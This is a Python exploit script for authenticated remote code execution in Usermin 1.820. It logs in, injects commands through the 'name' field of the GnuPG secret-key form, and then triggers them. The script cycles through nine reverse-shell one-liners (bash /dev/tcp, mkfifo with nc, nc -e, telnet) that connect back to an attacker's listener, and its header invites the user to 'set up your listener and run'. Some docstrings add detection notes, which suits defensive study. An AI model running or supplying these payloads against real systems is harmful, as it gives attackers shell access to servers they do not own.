#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
# author: github.com/sergiovks AKA SezioS
# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD -lh LHOST -lp LPORT
# https://youtu.be/wiRIWFAhz24
# This is an improved version of the "twitter.com/numanturle" exploit; the improvements are the lhost and lport flags and a larger set of reverse-shell payloads that the victim executes. Set up your listener and run!
import argparse
import requests
import warnings
import json
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd
# Suppress urllib3's InsecureRequestWarning: every request in this file is sent with
# verify=False, so the target's TLS certificate is never validated.
warnings.simplefilter('ignore', InsecureRequestWarning)
def init():
    """Parse the command-line options and hand the resulting namespace to ``exploit``.

    All five options are required; ``--lport`` is coerced to ``int`` and the
    others stay ``str``. ``argparse`` exits with a usage error when an option
    is missing or malformed, so ``exploit`` only ever sees a complete namespace.
    """
    option_table = (
        (('-u', '--host'), 'Host', str),
        (('-l', '--login'), 'Username', str),
        (('-p', '--password'), 'Password', str),
        (('-lh', '--lhost'), 'LHOST', str),
        (('-lp', '--lport'), 'LPORT', int),
    )
    cli = argparse.ArgumentParser(
        description='Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )'
    )
    for flags, help_text, value_type in option_table:
        cli.add_argument(*flags, help=help_text, type=value_type, required=True)
    exploit(cli.parse_args())
def exploit(args):
    """Run the authenticated Usermin GnuPG command-injection chain described in the file header.

    Flow (every request targets ``https://<host>:20000`` with TLS verification
    disabled): log in through ``session_login.cgi``; then, for each reverse-shell
    one-liner, post it as the ``name`` field of ``gnupg/secret.cgi``, read a key id
    back from ``gnupg/list_keys.cgi`` and request ``gnupg/edit_key.cgi`` for it.

    Args:
        args: ``argparse`` namespace with ``host``, ``login``, ``password``,
            ``lhost`` and ``lport`` (see ``init``).

    Returns:
        None. Progress and failures are reported with ``print`` only.

    Detection notes: each stage leaves a distinct server-side trace — a
    ``session_login.cgi`` POST carrying the ``redirect=1; testing=1`` cookie, a
    ``gnupg/secret.cgi`` POST whose ``name`` value begins with ``";`` and whose
    ``email`` is ``1337@webmin.com``, and an outbound connection from the Usermin
    host to ``lhost:lport``. The header names Usermin 1.820 as the affected
    version; consult the vendor advisory for the fixed release.
    """
    listen_ip = args.lhost
    listen_port = args.lport
    session = requests.Session()
    # Scheme and port are hard-coded; only the host comes from the command line.
    target = "https://{}:20000".format(args.host)
    username = args.login
    password = args.password
    print("[+] Target {}".format(target))
    headers = {
        'Cookie': 'redirect=1; testing=1;',
        'Referer': target
    }
    # verify=False: the certificate is not checked (see the module-level warnings filter).
    login = session.post(target+"/session_login.cgi", headers=headers, verify=False, data={"user": username, "pass": password})
    login_content = str(login.content)
    # Login success is inferred from the response body referencing webmin_search.cgi.
    search = "webmin_search.cgi"
    check_login_string = re.findall(search, login_content)
    if check_login_string:
        session_hand_login = session.cookies.get_dict()  # captured but never used below
        print("[+] Login successfully")
        print("[+] Setup GnuPG")
        # Each entry is a shell one-liner that connects back to listen_ip:listen_port.
        # The loop below tries every entry (no break), so one run can produce
        # several callbacks to the listener.
        commands = [
            'bash -i >& /dev/tcp/{}/{lport} 0>&1'.format(listen_ip, lport=listen_port),
            '0<&196;exec 196<>/dev/tcp/{}/{lport}; bash <&196 >&196 2>&196'.format(listen_ip, lport=listen_port),
            'exec 5<>/dev/tcp/{}/{lport}; cat <&5 | while read line; do $line 2>&5 >&5; done'.format(listen_ip, lport=listen_port),
            'bash -i 5<> /dev/tcp/{}/{lport} 0<&5 1>&5 2>&5'.format(listen_ip, lport=listen_port),
            'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc {lhost} {lport} >/tmp/f'.format(lhost=listen_ip, lport=listen_port),
            'nc {lhost} {lport} -e bash'.format(lhost=listen_ip, lport=listen_port),
            'busybox nc {lhost} {lport} -e bash'.format(lhost=listen_ip, lport=listen_port),
            'nc -c bash {lhost} {lport}'.format(lhost=listen_ip, lport=listen_port),
            'TF=$(mktemp -u);mkfifo $TF && telnet {lhost} {lport} 0<$TF | bash 1>$TF'.format(lhost=listen_ip, lport=listen_port)
        ]
        session.headers.update({'referer': target})
        for command in commands:
            payload = command
            # Injection point: the "name" field of the GnuPG secret-key form. The
            # surrounding '";' ... 'echo "' wrapper is inherited from the original
            # exploit; the server-side reason it is needed is not visible from this file.
            post_data = {
                "name": '";{}echo "'.format(payload),
                "email": "1337@webmin.com",
            }
            print("[+] Payload {}".format(post_data))
            create_secret = session.post(target+"/gnupg/secret.cgi", verify=False, data=post_data)
            create_secret_content = str(create_secret.content)
            # Key creation is judged solely by the literal word "successfully" in the response.
            search = "successfully"
            check_exp = re.findall(search, create_secret_content)
            if check_exp:
                print("[+] Setup successful")
                print("[+] Fetching key list")
                session.headers.update({'referer': target})
                key_list = session.post(target+"/gnupg/list_keys.cgi", verify=False)
                # Takes the second-to-last edit_key.cgi link. Raises IndexError (unhandled)
                # if fewer than two links are present. The pattern is a non-raw string, so
                # "\?" is an invalid escape sequence that newer Python versions warn about.
                last_gets_key = re.findall("edit_key.cgi\?(.*?)'", str(key_list.content))[-2]
                print("[+] Key : {}".format(last_gets_key))
                session.headers.update({'referer': target})
                # The 3 s timeout is expected to fire — presumably edit_key.cgi blocks while
                # the injected command runs — so ReadTimeout is deliberately swallowed and
                # treated as success rather than as a failure.
                try:
                    key_list = session.post(target+"/gnupg/edit_key.cgi?{}".format(last_gets_key), verify=False, timeout=3)
                except requests.exceptions.ReadTimeout:
                    pass
                print("[+] 5ucc355fully_3xpl017")
            else:
                print("[-] An unexpected error occurred")
    else:
        print("[-] AUTH: Login failed.")
# Entry-point guard: run the CLI only when executed as a script, not on import.
if __name__ == "__main__":
    init()